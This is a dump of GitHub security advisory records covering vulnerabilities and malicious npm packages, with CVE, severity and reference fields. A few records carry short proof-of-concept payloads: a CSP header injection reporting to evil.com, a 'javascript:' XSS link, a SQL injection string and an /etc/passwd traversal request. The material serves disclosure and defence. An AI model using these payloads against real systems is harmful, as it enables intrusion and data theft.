Improper Authentication in Apache Ozone
In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.
{'CVE-2021-39236'}
2021-11-23T17:56:45Z
2021-11-23T17:56:45Z
HIGH
8.8
{'CWE-287'}
{'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C0fd74baa-88a0-39a2-8f3a-b982acb25d5a%40apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/11/19/7', 'https://github.com/advisories/GHSA-5993-wwpg-m92c', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39236'}
null
GHSA
GHSA-7xvg-m3vx-2hhv
Downloads Resources over HTTP in webrtc-native
Affected versions of `webrtc-native` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `webrtc-native`. ## Recommendation No direct patch is currently available for this vulnerability. However, if the native components of `webrtc-native` are built from source, this avoids download the precompiled binary, therefore mitigating the insecure download. The package author has provided instructions for building from source [here](https://github.com/vmolsa/webrtc-native/wiki/Getting-started#building-from-source).
{'CVE-2016-10600'}
2021-01-08T19:13:16Z
2019-02-18T23:50:26Z
HIGH
0
{'CWE-311'}
{'https://www.npmjs.com/advisories/176', 'https://github.com/advisories/GHSA-7xvg-m3vx-2hhv', 'https://nodesecurity.io/advisories/176', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10600'}
null
GHSA
GHSA-f2jw-pr2c-9x96
Code injection in @rkesters/gnuplot
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The gnuplot package prior to version 0.1.0 for Node.js allows code execution via shell metacharacters in Gnuplot commands.
{'CVE-2021-29369'}
2022-05-05T00:45:10Z
2022-02-10T23:41:49Z
CRITICAL
9.8
{'CWE-77', 'CWE-78'}
{'https://github.com/rkesters/gnuplot/commit/23671d4d3d28570fb19a936a6328bfac742410de', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29369', 'https://github.com/advisories/GHSA-f2jw-pr2c-9x96', 'https://www.npmjs.com/package/@rkesters/gnuplot'}
null
GHSA
GHSA-w978-rmpf-qmwg
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers
### Impact If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ```ruby override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ```ruby override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` ### Patches This has been fixed in 6.3.0, 5.2.0, and 3.9.0 ### Workarounds ```ruby override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ``` ### References https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c [The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies) ### For more information If you have any questions or comments about this advisory: * Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new) * DM us at @ndm on twitter
{'CVE-2020-5216'}
2021-01-08T20:33:22Z
2020-01-23T02:27:53Z
MODERATE
4.4
{'CWE-113'}
{'https://github.com/advisories/GHSA-w978-rmpf-qmwg', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5216', 'https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg', 'https://github.com/twitter/secure_headers/commit/301695706f6a70517c2a90c6ef9b32178440a2d0'}
null
GHSA
GHSA-m7qm-r2r5-f77q
Cross-Site Scripting in react-marked-markdown
All versions of `react-marked-markdown` are vulnerable to cross-site scripting (XSS) via `href` attributes. This is exploitable if user is provided to `react-marked-markdown` Proof of concept: ``` import React from 'react' import ReactDOM from 'react-dom' import { MarkdownPreview } from 'react-marked-markdown' ReactDOM.render( <MarkdownPreview markedOptions={{ sanitize: true }} value={'[XSS](javascript: alert`1`)'} />, document.getElementById('root') ) ``` ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
null
2021-09-24T20:35:30Z
2020-09-01T20:43:48Z
HIGH
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-m7qm-r2r5-f77q', 'https://github.com/Vincent-P/react-marked-markdown/issues/61', 'https://www.npmjs.com/advisories/668', 'https://hackerone.com/reports/344069'}
null
GHSA
GHSA-7xf9-74cp-8hx3
Malicious Package in js-cha3
Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-09-30T17:00:59Z
2020-09-03T22:59:21Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/1281', 'https://github.com/advisories/GHSA-7xf9-74cp-8hx3'}
null
GHSA
GHSA-hpmr-g4pq-jhgp
Denial of service in chrono-node
This affects the package chrono-node before 2.2.4. It hangs on a date-like string with lots of embedded spaces.
{'CVE-2021-23371'}
2021-05-06T15:58:05Z
2021-05-06T15:58:05Z
HIGH
7.5
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23371', 'https://github.com/advisories/GHSA-hpmr-g4pq-jhgp', 'https://github.com/wanasit/chrono/commit/98815b57622443b5c498a427210ebd603d705f4c', 'https://github.com/wanasit/chrono/issues/382', 'https://snyk.io/vuln/SNYK-JS-CHRONONODE-1083228'}
null
GHSA
GHSA-h3qr-rq2j-74w4
HTTP Request Smuggling in hyper
An issue was discovered in the hyper crate before 0.12.34 for Rust. HTTP request smuggling can occur. Remote code execution can occur in certain situations with an HTTP server on the loopback interface.
{'CVE-2020-35863'}
2021-08-25T20:46:08Z
2021-08-25T20:46:08Z
CRITICAL
9.8
{'CWE-444'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35863', 'https://rustsec.org/advisories/RUSTSEC-2020-0008.html', 'https://github.com/hyperium/hyper/issues/1925', 'https://github.com/advisories/GHSA-h3qr-rq2j-74w4'}
null
GHSA
GHSA-393f-2jr3-cp69
CHECK-fail in DrawBoundingBoxes
### Impact An attacker can trigger a denial of service via a `CHECK` failure by passing an empty image to `tf.raw_ops.DrawBoundingBoxes`: ```python import tensorflow as tf images = tf.fill([53, 0, 48, 1], 0.) boxes = tf.fill([53, 31, 4], 0.) boxes = tf.Variable(boxes) boxes[0, 0, 0].assign(3.90621) tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes) ``` This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/ea34a18dc3f5c8d80a40ccca1404f343b5d55f91/tensorflow/core/kernels/image/draw_bounding_box_op.cc#L148-L165) uses `CHECK_*` assertions instead of `OP_REQUIRES` to validate user controlled inputs. Whereas `OP_REQUIRES` allows returning an error condition back to the user, the `CHECK_*` macros result in a crash if the condition is false, similar to `assert`. ```cc const int64 max_box_row_clamp = std::min<int64>(max_box_row, height - 1); ... CHECK_GE(max_box_row_clamp, 0); ``` In this case, `height` is 0 from the `images` input. This results in `max_box_row_clamp` being negative and the assertion being falsified, followed by aborting program execution. ### Patches We have patched the issue in GitHub commit [b432a38fe0e1b4b904a6c222cbce794c39703e87](https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87). The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
{'CVE-2021-29533'}
2021-05-21T14:22:21Z
2021-05-21T14:22:21Z
LOW
2.5
{'CWE-754'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-29533', 'https://github.com/advisories/GHSA-393f-2jr3-cp69', 'https://github.com/tensorflow/tensorflow/commit/b432a38fe0e1b4b904a6c222cbce794c39703e87', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-393f-2jr3-cp69'}
null
GHSA
GHSA-q656-g2x3-8cgh
Kylin can receive user input and load any class through Class.forName(...).
Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.
{'CVE-2021-31522'}
2022-01-13T18:41:26Z
2022-01-08T00:43:01Z
MODERATE
0
{'CWE-470'}
{'https://github.com/apache/kylin/pull/1763', 'https://lists.apache.org/thread/hh5crx3yr701zd8wtpqo1mww2rlkvznw', 'http://www.openwall.com/lists/oss-security/2022/01/06/4', 'https://github.com/advisories/GHSA-q656-g2x3-8cgh', 'https://github.com/apache/kylin/pull/1695', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31522'}
null
GHSA
GHSA-m9jw-237r-gvfv
SQL Injection in sequelize
Affected versions of `sequelize` are vulnerable to SQL Injection. The function `sequelize.json()` incorrectly formatted sub paths for JSON queries, which allows attackers to inject SQL statements and execute arbitrary SQL queries if user input is passed to the query. Exploitation example: ```return User.findAll({ where: this.sequelize.json("data.id')) AS DECIMAL) = 1 DELETE YOLO INJECTIONS; -- ", 1) });``` ## Recommendation If you are using `sequelize` 5.x, upgrade to version 5.15.1 or later. If you are using `sequelize` 4.x, upgrade to version 4.44.3 or later.
{'CVE-2019-10752'}
2021-08-18T21:54:56Z
2019-10-25T19:43:16Z
CRITICAL
9.8
{'CWE-89'}
{'https://github.com/advisories/GHSA-m9jw-237r-gvfv', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-459751,', 'https://github.com/sequelize/sequelize/commit/9bd0bc111b6f502223edf7e902680f7cc2ed541e', 'https://www.npmjs.com/advisories/1146', 'https://github.com/sequelize/sequelize/pull/11329', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10752', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-459751', 'https://github.com/sequelize/sequelize/commit/9bd0bc1,'}
null
GHSA
GHSA-v362-2895-h9r2
Use After Free in lru
An issue was discovered in the lru crate before 0.7.1 for Rust. The iterators have a use-after-free, as demonstrated by an access after a pop operation.
{'CVE-2021-45720'}
2022-01-07T22:37:01Z
2022-01-07T22:37:01Z
HIGH
7.5
{'CWE-416'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0130.html', 'https://github.com/advisories/GHSA-v362-2895-h9r2', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/lru/RUSTSEC-2021-0130.md', 'https://nvd.nist.gov/vuln/detail/CVE-2021-45720'}
null
GHSA
GHSA-4xgp-xrg3-c73w
Malicious Package in commqnder
All versions of `commqnder` contain malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive. ## Recommendation Remove the package from your environment and verify whether your system is running the cryptocurrency miner.
null
2021-09-30T22:02:57Z
2020-09-11T21:10:29Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-4xgp-xrg3-c73w', 'https://www.npmjs.com/advisories/924'}
null
GHSA
GHSA-744r-vv2g-2x6g
Apache NiFi information disclosure by XXE
The XMLFileLookupService in NiFi versions 1.3.0 to 1.9.2 allowed trusted users to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE) and reveal information such as the versions of Java, Jersey, and Apache that the NiFI instance uses.
{'CVE-2019-10080'}
2021-09-24T17:55:44Z
2019-12-02T18:17:36Z
MODERATE
6.5
{'CWE-611'}
{'https://nifi.apache.org/security.html#CVE-2019-10080', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10080', 'https://github.com/apache/nifi/pull/3507', 'https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E', 'https://github.com/advisories/GHSA-744r-vv2g-2x6g', 'https://www.oracle.com/security-alerts/cpuApr2021.html'}
null
GHSA
GHSA-hj3m-v758-jwx5
Path Traversal in http-server-node
All versions of package http-server-node are vulnerable to Directory Traversal via use of --path-as-is.
{'CVE-2021-23797'}
2022-01-05T15:02:43Z
2022-01-05T15:02:43Z
HIGH
7.5
{'CWE-22'}
{'https://github.com/advisories/GHSA-hj3m-v758-jwx5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23797', 'https://snyk.io/vuln/SNYK-JS-HTTPSERVERNODE-1727656'}
null
GHSA
GHSA-m5h6-hr3q-22h5
npm Token Leak in npm
Affected versions of the `npm` package include the bearer token of the logged in user in every request made by the CLI, even if the request is not directed towards the user's active registry. An attacker could create an HTTP server to collect tokens, and by various means including but not limited to install scripts, cause the npm CLI to make a request to that server, which would compromise the user's token. This compromised token could be used to do anything that the user could do, including publishing new packages. ## Recommendation 1. Update npm with `npm install npm@latest -g` 2. [Revoke your Tokens](https://www.npmjs.com/settings/tokens) 3. Enable [Two-Factor Authentication](https://docs.npmjs.com/getting-started/using-two-factor-authentication)
{'CVE-2016-3956'}
2021-06-16T19:54:44Z
2018-07-31T22:58:35Z
HIGH
0
{'CWE-200'}
{'https://nodejs.org/en/blog/vulnerability/npm-tokens-leak-march-2016/', 'https://github.com/npm/npm/commit/fea8cc92cee02c720b58f95f14d315507ccad401', 'https://www.npmjs.com/advisories/98', 'https://github.com/advisories/GHSA-m5h6-hr3q-22h5', 'http://www-01.ibm.com/support/docview.wss?uid=swg21980827', 'http://blog.npmjs.org/post/142036323955/fixing-a-bearer-token-vulnerability', 'https://github.com/npm/npm/commit/f67ecad59e99a03e5aad8e93cd1a086ae087cb29', 'https://nvd.nist.gov/vuln/detail/CVE-2016-3956', 'https://github.com/npm/npm/issues/8380'}
null
GHSA
GHSA-r9vm-rhmf-7hxx
OS Command Injection in im-resize
im-resize through 2.3.2 allows remote attackers to execute arbitrary commands via the "exec" argument. The cmd argument used within index.js, can be controlled by user without any sanitization.
{'CVE-2019-10787'}
2021-04-13T15:17:06Z
2021-04-13T15:17:06Z
HIGH
9.8
{'CWE-78'}
{'https://github.com/advisories/GHSA-r9vm-rhmf-7hxx', 'https://snyk.io/vuln/SNYK-JS-IMRESIZE-544183', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10787', 'https://github.com/Turistforeningen/node-im-resize/commit/de624dacf6a50e39fe3472af1414d44937ce1f03'}
null
GHSA
GHSA-5g6j-8hv4-vfgj
Cross-Site Scripting in node-red
Versions of `node-red` prior to 0.18.6 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new items, allowing attackers to execute arbitrary JavaScript in the victim's browser. ## Recommendation Upgrade to version 0.18.6 or later.
null
2021-09-28T17:03:46Z
2020-09-11T21:21:19Z
HIGH
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-5g6j-8hv4-vfgj', 'https://hackerone.com/reports/349146', 'https://www.npmjs.com/advisories/993'}
null
GHSA
GHSA-4c4g-crqm-xrxw
Use of unitialized value in TFLite
### Impact All TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200): ```cc const auto* affine_quantization = reinterpret_cast<TfLiteAffineQuantization*>( filter->quantization.params); ``` The issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code. ### Patches We have patched the issue in GitHub commits [537bc7c723439b9194a358f64d871dd326c18887](https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887), [4a91f2069f7145aab6ba2d8cfe41be8a110c18a5](https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5) and [8933b8a21280696ab119b63263babdb54c298538](https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538). The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-37682'}
2021-08-25T14:40:32Z
2021-08-25T14:40:32Z
MODERATE
4.4
{'CWE-908'}
{'https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538', 'https://github.com/advisories/GHSA-4c4g-crqm-xrxw', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4c4g-crqm-xrxw', 'https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37682', 'https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5'}
null
GHSA
GHSA-mrwr-2945-fr22
Cross-site scripting in PageKit
In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/exp.svg" that will point to http://localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack.
{'CVE-2021-32245'}
2021-06-23T18:44:30Z
2021-06-22T15:17:28Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/advisories/GHSA-mrwr-2945-fr22', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32245', 'https://github.com/pagekit/pagekit/issues/963'}
null
GHSA
GHSA-mjcr-rqjg-rhg3
Implementation trusts the "me" field returned by the authorization server without verifying it
### Impact A malicious user can sign in as a user with any IndieAuth identifier. This is because the implementation does not verify that the final `"me"` URL value returned by the authorization server belongs to the same domain as the initial value entered by the user. ### Patches Version 1.1 fixes this issue. ### Workarounds There is no workaround. Upgrade to 1.1 immediately. ### References - [Security Considerations: Differing User Profile URLs](https://indieauth.spec.indieweb.org/#differing-user-profile-urls-li-1) in the IndieAuth specification. ### For more information If you have any questions or comments about this advisory: * Open an issue in [simonw/datasette-indieauth](https://github.com/simonw/datasette-indieauth/issues)
null
2022-03-21T20:04:50Z
2020-11-24T21:21:04Z
CRITICAL
0
{'CWE-290'}
{'https://pypi.org/project/datasette-indieauth/', 'https://github.com/advisories/GHSA-mjcr-rqjg-rhg3', 'https://github.com/simonw/datasette-indieauth/security/advisories/GHSA-mjcr-rqjg-rhg3', 'https://github.com/simonw/datasette-indieauth/commit/376c8804c6b0811852049229a24336fe5eb6a439'}
null
GHSA
GHSA-g795-4hxx-qqwm
Cross-site Scripting in Pimcore
Pimcore prior to 10.4.0 is vulnerable to stored cross-site scripting.
{'CVE-2022-0893'}
2022-03-29T21:30:16Z
2022-03-16T00:00:47Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/pimcore/pimcore/commit/6e0922c5b2959ac1b48500ac508d8fc5a97286f9', 'https://github.com/advisories/GHSA-g795-4hxx-qqwm', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0893', 'https://huntr.dev/bounties/2859a1c1-941c-4efc-a3ad-a0657c7a77e9', 'https://github.com/pimcore/pimcore/pull/11447'}
null
GHSA
GHSA-28ph-f7gx-fqj8
Data races in rusqlite
An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via create_module.
{'CVE-2020-35867'}
2021-08-25T20:47:57Z
2021-08-25T20:47:57Z
CRITICAL
9.8
{'CWE-362'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-35867', 'https://github.com/advisories/GHSA-28ph-f7gx-fqj8', 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0', 'https://github.com/rusqlite/rusqlite/commit/3c6b57fe1b2cc87e7ebecde43dd836ffb1c4ea5c', 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}
null
GHSA
GHSA-c9jj-3wvg-q65h
Vulnerability that affects org.apache.pdfbox:pdfbox
Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF.
{'CVE-2019-0228'}
2022-05-04T20:30:02Z
2019-07-05T21:12:54Z
CRITICAL
9.8
{'CWE-611'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-0228', 'https://lists.apache.org/thread.html/r32b8102392a174b17fd19509a9e76047f74852b77b7bf46af95e45a2@%3Cserver-dev.james.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ/', 'https://lists.apache.org/thread.html/be86fcd7cd423a3fe6b73a3cb9d7cac0b619d0deb99e6b5d172c98f4@%3Ccommits.tika.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/bc8db1bf459f1ad909da47350ed554ee745abe9f25f2b50cad4e06dd@%3Cserver-dev.james.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX/', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r0a2141abeddae66dd57025f1681c8425834062b7c0c7e0b1d830a95d@%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/8a19bd6d43e359913341043c2a114f91f9e4ae170059539ad1f5673c@%3Ccommits.tika.apache.org%3E', 'https://lists.apache.org/thread.html/1a3756557f8cb02790b7183ccf7665ae23f608a421c4f723113bca79@%3Cusers.pdfbox.apache.org%3E', 'https://github.com/advisories/GHSA-c9jj-3wvg-q65h'}
null
GHSA
GHSA-7gfg-6934-mqq2
Improper Authenication in Pion DTLS
handleIncomingPacket in conn.go in Pion DTLS before 1.5.2 lacks a check for application data with epoch 0, which allows remote attackers to inject arbitrary unencrypted data after handshake completion.
{'CVE-2019-20786'}
2021-06-29T21:34:57Z
2021-06-29T21:34:57Z
CRITICAL
5.6
{'CWE-287'}
{'https://www.usenix.org/conference/usenixsecurity20/presentation/fiterau-brostean', 'https://nvd.nist.gov/vuln/detail/CVE-2019-20786', 'https://github.com/pion/dtls/compare/v1.5.1...v1.5.2', 'https://github.com/pion/dtls/commit/fd73a5df2ff0e1fb6ae6a51e2777d7a16cc4f4e0', 'https://github.com/advisories/GHSA-7gfg-6934-mqq2', 'https://www.usenix.org/system/files/sec20fall_fiterau-brostean_prepub.pdf'}
null
GHSA
GHSA-wjpj-gmc3-5w56
Malicious Package in buvfer-xor
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-09-30T15:46:02Z
2020-09-03T22:30:31Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/1268', 'https://github.com/advisories/GHSA-wjpj-gmc3-5w56'}
null
GHSA
GHSA-4jwx-78vx-gm6g
Cross-Site Request Forgery in kimai2
CSRF in saving invoices / modifying status of invoices (pending and cancel only)
{'CVE-2021-4033'}
2021-12-14T15:29:59Z
2021-12-10T20:34:01Z
MODERATE
6.5
{'CWE-352'}
{'https://huntr.dev/bounties/e05be1f7-d00c-4cfd-9390-ccd9d1c737b7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4033', 'https://github.com/advisories/GHSA-4jwx-78vx-gm6g', 'https://github.com/kevinpapst/kimai2/commit/1da26e041df62c10bd8075d78f2db7854d3eee07'}
null
GHSA
GHSA-w65v-hx54-xrqx
Malicious Package in midway-xtpl
All versions of `midway-xtpl` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-09-30T19:50:36Z
2020-09-03T17:41:23Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/1057', 'https://github.com/advisories/GHSA-w65v-hx54-xrqx'}
null
GHSA
GHSA-cr5w-6rv4-r2qg
Malicious Package in maleficent
All versions of `maleficent` contain malicious code. The package is a demonstration of possible risks when installing npm packages. It gathers system information such as: environment variables, OS information, network interface, AWS credentials, npm credentials and ssh keys. The package prints the information to a local file but does not upload it to a remote server. ## Recommendation Remove the package from your environment. There is no further compromise.
null
2021-09-30T21:58:49Z
2020-09-03T02:37:45Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-cr5w-6rv4-r2qg', 'https://www.npmjs.com/advisories/951'}
null
GHSA
GHSA-3x94-fv5h-5q2c
Exposure of Sensitive Information to an Unauthorized Actor in TYPO3 CMS
> ### Meta > * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (7.5) > * CWE-20, CWE-200 ### Problem In case an attacker manages to generate a valid cryptographic message authentication code (HMAC-SHA1) - either by using a different existing vulnerability or in case the internal _encryptionKey_ was exposed - it is possible to retrieve arbitrary files of a TYPO3 installation. This includes the possibility to fetch _typo3conf/LocalConfiguration.php_ which again contains the _encryptionKey_ as well as credentials of the database management system being used. In case a database server is directly accessible either via internet or in a shared hosting network, this allows to completely retrieve, manipulate or delete database contents. This includes creating an administration user account - which can be used to trigger remote code execution by injecting custom extensions. ### Solution Update to TYPO3 versions 9.5.20 or 10.4.6 that fix the problem described. ### Credits Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue. ### References * [TYPO3-CORE-SA-2020-007](https://typo3.org/security/advisory/typo3-core-sa-2020-007)
{'CVE-2020-15099'}
2022-04-19T19:02:36Z
2020-07-29T16:15:32Z
HIGH
8.1
{'CWE-200', 'CWE-20'}
{'https://github.com/advisories/GHSA-3x94-fv5h-5q2c', 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-3x94-fv5h-5q2c', 'https://typo3.org/security/advisory/typo3-core-sa-2020-007', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15099'}
null
GHSA
GHSA-34jq-548x-m2x9
Improper Resource Shutdown or Release in TYPO3 extension
Wrong usage of the TYPO3 FAL API results in copies of processed files being saved to the /var/transient/ folder of a TYPO3 website on every frontend request. This can result in Denial of Service, since the webspace may be filled up with image files simply by crafting a large amount of requests to the website.
{'CVE-2021-38623'}
2021-08-30T17:22:57Z
2021-08-30T17:22:57Z
HIGH
7
{'CWE-404'}
{'https://typo3.org/security/advisory/typo3-ext-sa-2021-009', 'https://github.com/advisories/GHSA-34jq-548x-m2x9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-38623'}
null
GHSA
GHSA-wv39-cgmm-cq29
Malicious Package in buffmr-xor
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user. ## Recommendation Remove the package from your environment. Ensure no Ethereum funds were compromised.
null
2021-09-29T21:27:20Z
2020-09-03T22:23:00Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-wv39-cgmm-cq29', 'https://www.npmjs.com/advisories/1261'}
null
GHSA
GHSA-j7vx-8mqj-cqp9
Exposure of Sensitive Information to an Unauthorized Actor in Doorkeeper
### Impact Information disclosure vulnerability. Allows an attacker to see all `Doorkeeper::Application` model attribute values (including secrets) using authorized applications controller if it's enabled (GET /oauth/authorized_applications.json). ### Patches These versions have the fix: * 5.0.3 * 5.1.1 * 5.2.5 * 5.3.2 ### Workarounds Patch `Doorkeeper::Application` model `#as_json(options = {})` method and define only those attributes you want to expose. Additional recommended hardening is to enable application secrets hashing ([guide](https://doorkeeper.gitbook.io/guides/security/token-and-application-secrets)), available since Doorkeeper 5.1. This would render the exposed secret useless. ### References - Commit with fix: https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10187
{'CVE-2020-10187'}
2022-04-19T19:02:27Z
2020-05-07T21:11:07Z
HIGH
7.5
{'CWE-862'}
{'https://github.com/advisories/GHSA-j7vx-8mqj-cqp9', 'https://github.com/doorkeeper-gem/doorkeeper/releases', 'https://github.com/rubysec/ruby-advisory-db/pull/446', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10187', 'https://github.com/doorkeeper-gem/doorkeeper/commit/25d038022c2fcad45af5b73f9d003cf38ff491f6', 'https://github.com/doorkeeper-gem/doorkeeper/security/advisories/GHSA-j7vx-8mqj-cqp9'}
null
GHSA
GHSA-rx32-c25r-79mx
Directory Traversal in serverhuwenhui
Affected versions of `serverhuwenhui` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16102'}
2021-01-14T15:54:04Z
2020-09-01T16:54:41Z
HIGH
0
{'CWE-22'}
